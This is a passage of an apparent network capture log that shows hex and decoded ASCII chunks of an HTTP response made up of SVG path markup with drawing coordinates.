                                                                                                                                                                              2023-09-15 05:28:19 UTC5888INData Raw: 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 38 31 2e 30 39 2c 32 34 37 2e 33 32 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 38 31
                                                                                                                                                                              Data Ascii: .37,0,0,1-.51,2.84,2.21,2.21,0,0,1-2.85,0,2.08,2.08,0,0,1-.15-2.81"/><path class="cls-4" d="M981.09,247.32a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.38,2.38,0,0,1-.51,2.84,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.15-2.82"/><path class="cls-4" d="M981
                                                                                                                                                                              2023-09-15 05:28:19 UTC5904INData Raw: 2c 31 38 36 2e 38 31 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 35 31 2e 34 39 2c 31 39 33 2e 36 34 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 32 2c 32 2e 33 39 2c 32 2e 33 39 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 35 2c 32 2e 32 33 2c 32 2e 32 33 2c 30 2c 30 2c 31 2d 32 2e
                                                                                                                                                                              Data Ascii: ,186.81a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-.51,2.84,2.22,2.22,0,0,1-2.85,0,2.08,2.08,0,0,1-.15-2.81"/><path class="cls-4" d="M951.49,193.64a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.92,2.39,2.39,0,0,1-.5,2.85,2.23,2.23,0,0,1-2.
                                                                                                                                                                              2023-09-15 05:28:19 UTC5920INData Raw: 30 2c 31 2d 32 2e 38 36 2c 30 41 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2c 39 32 32 2c 31 32 35 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 32 31 2e 36 37 2c 31 33 33 2e 31 32 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 32 31 2e 39 2c 31 34 30 61 31 2e 36 38 2c 31 2e 36 38 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e
                                                                                                                                                                              Data Ascii: 0,1-2.86,0A2.09,2.09,0,0,1,922,125"/><path class="cls-4" d="M921.67,133.12a1.69,1.69,0,0,1,.76-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.86,0,2.1,2.1,0,0,1-.15-2.82"/><path class="cls-4" d="M921.9,140a1.68,1.68,0,0,1,.76-2.2,2.
                                                                                                                                                                              2023-09-15 05:28:19 UTC5936INData Raw: 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 33 2c 32 2e 32 33 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 30 35 2e 34 37 2c 32 37 30 2e 33 39 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 41 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2c 39 30 39 2c 32 37 32 61 32 2e 32 33 2c 32 2e 32 33 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 2f 3e 3c
                                                                                                                                                                              Data Ascii: 48,2.48,0,0,1,3.29.93,2.38,2.38,0,0,1-.5,2.84,2.23,2.23,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.82"/><path class="cls-4" d="M905.47,270.39a1.7,1.7,0,0,1,.77-2.2,2.47,2.47,0,0,1,3.29.93A2.38,2.38,0,0,1,909,272a2.23,2.23,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.81"/><
                                                                                                                                                                              2023-09-15 05:28:19 UTC5952INData Raw: 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 37 35 2e 36 35 2c 32 30 39 2e 38 37 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 39 2c 32 2e 34 39 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 37 35 2e 38 38 2c 32 31 36 2e 37 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d
                                                                                                                                                                              Data Ascii: class="cls-4" d="M875.65,209.87a1.69,1.69,0,0,1,.76-2.2,2.49,2.49,0,0,1,3.29.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.81"/><path class="cls-4" d="M875.88,216.7a1.69,1.69,0,0,1,.76-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-
                                                                                                                                                                              2023-09-15 05:28:19 UTC5968INData Raw: 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 34 36 2e 30 35 2c 31 35 36 2e 31 39 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22
                                                                                                                                                                              Data Ascii: 36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.82"/><path class="cls-4" d="M846.05,156.19a1.69,1.69,0,0,1,.77-2.2,2.46,2.46,0,0,1,3.28.93,2.36,2.36,0,0,1-.5,2.84,2.21,2.21,0,0,1-2.85,0,2.08,2.08,0,0,1-.16-2.81"/><path class="cls-4" d="
                                                                                                                                                                              2023-09-15 05:28:19 UTC5984INData Raw: 2c 32 38 36 2e 36 33 61 31 2e 36 38 2c 31 2e 36 38 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 32 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 35 2c 32 2e 32 33 2c 32 2e 32 33 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 32 39 2e 38 36 2c 32 39 33 2e 34 35 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32
                                                                                                                                                                              Data Ascii: ,286.63a1.68,1.68,0,0,1,.76-2.2,2.48,2.48,0,0,1,3.29.92,2.37,2.37,0,0,1-.5,2.85,2.23,2.23,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.81"/><path class="cls-4" d="M829.86,293.45a1.7,1.7,0,0,1,.76-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-.5,2.84,2.21,2.21,0,0,1-2
                                                                                                                                                                              2023-09-15 05:28:20 UTC6001INData Raw: 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 30 30 2c 32 33 32 2e 39 34 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 30 30 2e 32 36 2c 32 33 39 2e 37 37 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39
                                                                                                                                                                              Data Ascii: ,0,0,1-.16-2.81"/><path class="cls-4" d="M800,232.94a1.7,1.7,0,0,1,.77-2.2,2.46,2.46,0,0,1,3.28.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.82"/><path class="cls-4" d="M800.26,239.77a1.7,1.7,0,0,1,.77-2.2,2.46,2.46,0,0,1,3.28.9
                                                                                                                                                                              2023-09-15 05:28:20 UTC6017INData Raw: 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 30 35 2c 32 32 39 2e 32 35 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 30 34 2e 37 33 2c 32 32 31 2e 35 33 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39
                                                                                                                                                                              Data Ascii: 37,2.37,0,0,1,.18,3.18"/><path class="cls-7" d="M505,229.25a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1-3.71-1,2.68,2.68,0,0,1,.57-3.22,2.51,2.51,0,0,1,3.22,0,2.37,2.37,0,0,1,.18,3.18"/><path class="cls-7" d="M504.73,221.53a1.92,1.92,0,0,1-.87,2.49,2.79,2.79
                                                                                                                                                                              2023-09-15 05:28:20 UTC6033INData Raw: 3d 22 4d 35 32 33 2e 38 31 2c 38 39 2e 35 36 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 32 33 2e 35 35 2c 38 31 2e 38 34 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e
                                                                                                                                                                              Data Ascii: ="M523.81,89.56a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1-3.71-1,2.68,2.68,0,0,1,.57-3.22,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M523.55,81.84a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1,2.66,2.66,0,0,1,.57-3.21,2.5,2.
                                                                                                                                                                              2023-09-15 05:28:20 UTC6049INData Raw: 2e 36 36 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 35 37 2e 35 32 2c 31 35 37 2e 39 34 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33
                                                                                                                                                                              Data Ascii: .66a1.92,1.92,0,0,1-.87,2.49,2.8,2.8,0,0,1-3.71-1.05,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M557.52,157.94a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1.05,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3
                                                                                                                                                                              2023-09-15 05:28:20 UTC6065INData Raw: 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 39 31 2e 34 39 2c 32 33 34 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 38 2c 32 2e 37 38 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 37 2c 32 2e 36 37 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61
                                                                                                                                                                              Data Ascii: 9,0,0,1-3.71-1.05,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.18,3.17"/><path class="cls-7" d="M591.49,234a1.92,1.92,0,0,1-.87,2.49,2.78,2.78,0,0,1-3.71-1.05,2.67,2.67,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><pa
                                                                                                                                                                              2023-09-15 05:28:20 UTC6081INData Raw: 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 31 30 2e 33 31 2c 39 34 2e 33 36 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 38 2c 32 2e 37 38 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 37 2c 32 2e 36 37 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 31 30 2e 30 35 2c 38 36 2e 36 34
                                                                                                                                                                              Data Ascii: 1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M610.31,94.36a1.91,1.91,0,0,1-.87,2.48,2.78,2.78,0,0,1-3.71-1,2.67,2.67,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M610.05,86.64
                                                                                                                                                                              2023-09-15 05:28:20 UTC6097INData Raw: 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 34 34 2e 32 38 2c 31 37 30 2e 34 36 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 34 34 2c 31 36 32 2e 37 34 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c
                                                                                                                                                                              Data Ascii: 6,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M644.28,170.46a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1-3.71-1,2.68,2.68,0,0,1,.57-3.22,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M644,162.74a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,
                                                                                                                                                                              2023-09-15 05:28:20 UTC6113INData Raw: 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 37 38 2e 32 35 2c 32 34 36 2e 35 36 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 37 38 2c 32 33 38 2e 38 34 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32
                                                                                                                                                                              Data Ascii: "/><path class="cls-7" d="M678.25,246.56a1.92,1.92,0,0,1-.87,2.49,2.8,2.8,0,0,1-3.71-1.05,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M678,238.84a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1.05,2.66,2
                                                                                                                                                                              2023-09-15 05:28:20 UTC6129INData Raw: 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 39 36 2e 38 31 2c 39 39 2e 31 35 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 36 2d 33 2e 32 31 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e
                                                                                                                                                                              Data Ascii: a1.92,1.92,0,0,1-.87,2.49,2.8,2.8,0,0,1-3.71-1,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M696.81,99.15a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1,2.68,2.68,0,0,1,.56-3.21,2.52,2.52,0,0,1,3.23,0,2.
                                                                                                                                                                              2023-09-15 05:28:20 UTC6145INData Raw: 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 33 30 2e 37 38 2c 31 37 35 2e 32 36 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 38 2c 32 2e 37 38 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 36 2d 33 2e 32 31 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22
                                                                                                                                                                              Data Ascii: 1.05,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M730.78,175.26a1.91,1.91,0,0,1-.87,2.48,2.78,2.78,0,0,1-3.71-1.05,2.68,2.68,0,0,1,.56-3.21,2.52,2.52,0,0,1,3.23,0,2.36,2.36,0,0,1,.17,3.18"/><path class="
